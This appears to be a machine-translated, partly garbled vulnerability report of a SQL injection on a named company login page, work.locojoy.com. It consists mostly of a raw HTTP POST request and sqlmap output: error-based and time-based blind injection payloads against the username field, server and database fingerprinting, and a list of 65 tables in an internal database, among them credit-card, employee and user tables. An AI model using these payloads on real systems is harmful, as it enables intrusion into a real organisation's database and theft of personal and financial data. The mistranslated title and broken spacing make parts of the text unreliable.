Tencent Excel has the SQL injection vulnerability on a website
Tencent Excel has the SQL injection vulnerability on a website
POST/index. php/Home/Index/HTTP/1.1
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://work.locojoy.com
Cookie: PHPSESSID = ke5ruinsoeh0knj1dkjds2ukb4
Host: work.locojoy.com
Connection: Keep-alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept :*/*
Act = login & password = g00dPa % 24% 24w0rD & username = 1
Code Region
Sqlmap resumed the following injection point (s) from stored session:
---
Parameter: username (POST)
Type: error-based
Title: MySQL & gt; = 5.0 AND error-based-WHERE, HAVING, order by or group by clause
Payload: act = login & password = g00dPa $ w0rD & username = 1 ') AND (SELECT 8346 FROM (select count (*), CONCAT (0x71766a7871, (SELECT (ELT (8346 = 8346, 1), 0x717a627071, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x)) AND ('lxho' = 'lxho
Type: AND/OR time-based blind
Title: MySQL> = 5.0.12 AND time-based blind (SELECT)
Payload: act = login & password = g00dPa $ w0rD & username = 1 ') AND (SELECT * FROM (SELECT (SLEEP (5) Kayt) AND ('auos '= 'auos
---
Web server operating system: Linux CentOS 6.5
Web application technology: Apache 2.2.15
Back-end DBMS: MySQL> = 5.0.0
Database: locojoy_oa
[65 tables]
+ ---------------------------- +
| Lj_activity |
| Lj_chengshi |
| Lj_city |
| Lj_company |
| Lj_config_christmas |
| Lj_creditcard_list |
| Lj_depart_group |
| Lj_department |
| Lj_dkp_data |
| Lj_dkp_list |
| Lj_employee |
| Lj_file_doc |
| Lj_file_table |
| Lj_file_table_type |
| Lj_food_menu |
| Lj_group |
| Lj_holiday |
| Lj_kpi_data |
| Lj_kpi_depart |
| Lj_kpi_list |
| Lj_kpi_option |
| Lj_logs |
| Lj_lottery |
| Lj_mobile |
| Lj_module |
| Lj_notice |
| Lj_province |
| Lj_score_week |
| Lj_share1 |
| Lj_share2 |
| Lj_1_3 |
| Lj_system_event |
| Lj_user |
| Lj_user_christmas |
| Lj_user_clock |
| Lj_user_creditcard |
| Lj_user_food |
| Lj_user_gamecoins |
| Lj_user_holiday |
| Lj_user_holiday_data |
| Lj_user_holiday_no1year |
| Lj_user_kpi |
| Lj_user_log |
| Lj_user_lottery |
| Lj_user_lottery_outer |
| Lj_user_massageticket |
| Lj_user_memo |
| Lj_user_message |
| Lj_user_message1 |
| Lj_user_project_data |
| Lj_user_project_list |
| Lj_user_project_node |
| Lj_user_projectreport_data |
| Lj_user_projectreport_list |
| Lj_user_score |
| Lj_user_score_level |
| Lj_user_score_sp |
| Lj_user_score_txt |
| Lj_vote_data |
| Lj_vote_list |
| Lj_vote_xing |
| Lj_wifi |
| Lj_worklog |
| Lj_worklog_inner |
| Lj_worklog_pl |
+ ---------------------------- +